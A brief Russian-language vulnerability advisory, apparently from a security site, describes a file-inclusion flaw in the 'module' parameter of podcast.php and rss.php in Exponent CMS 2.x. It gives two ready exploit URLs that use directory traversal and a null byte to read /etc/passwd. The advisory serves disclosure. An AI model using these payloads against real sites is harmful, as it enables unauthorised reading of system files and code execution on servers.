Программа: Exponent CMS 2.x

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре "module" сценариями podcast.php и rss.php. Удаленный
пользователь может выполнить произвольный PHP сценарий на целевой системе с
привилегиями Web сервера.

Эксплоит:

http://exponent/podcast.php?module=../../../../../../../etc/passwd%00
http://exponent/rss.php?module=../../../../../../../etc/passwd%00



Оставить мнение